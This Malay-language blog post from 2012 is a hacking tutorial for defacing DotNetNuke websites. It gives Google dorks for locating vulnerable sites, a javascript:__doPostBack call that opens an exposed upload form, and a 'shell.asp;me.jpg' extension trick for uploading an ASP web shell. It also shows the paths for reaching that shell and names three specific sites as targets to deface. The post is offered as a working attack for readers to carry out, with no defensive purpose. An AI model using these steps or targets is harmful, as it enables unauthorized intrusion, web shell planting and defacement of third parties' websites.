Labels

Pages

Cari Blog Ini

Khamis, 5 Januari 2012

hello hacker !
aku nak aja deface dengan DNN. ape DNN tu ???
DNN tu singkatan dari DotNetNuke

Okey, lets start

1.cari site yang vuln guna dork kt bawah ni : 

inurl:portals/0/
inurl:tabid/176/Default.aspx
inurl:fcklinkgallery.aspx
inurl:/fck/fcklinkgallery.aspx

search kt google dan pilih satu website

2.nanti kelua macam bawah ni : 
3.tick dekat File( Enter The Address Of The Link). nanti kelua macam bawah ni :
4.padam link di Address Bar dan replace dengan javascript ni dan click enter

javascript:__doPostBack('ctlURL$cmdUpload','')

#kalau pakai google chrome, tulis balik " javascript: " sebab kalau copy paste " javascript: " akan hilang sendiri

5.nanti kelaur macam bawah ni:


6.tekan click choose file, pilih file dan tekan upload selected file
# hanya boleh upload file macam bawah ni saja

*. docx, *.xlsx, *.pptx, *.swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.spin

#korang boleh upload shell asp dengan extension seperti ini : shell.asp;me.jpg

7.kalau nak tengok file korang buat macam ni 

http://www.site.com/portals/0/filekorang.txt

kalau nak tengok shell buat macam ni

http://www.site.com/portals/0/shell.asp;me.jpg


ok siap ^^
ni site yang boleh korang deface : 

http://www.parallax.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
http://www.parkroway.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
http://www.classicrenovators.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Have A Good Day ^^
S E L A M A T M E N C U B A

Tiada ulasan:

Catat Ulasan

artikel lain dari ping busuk

click like n share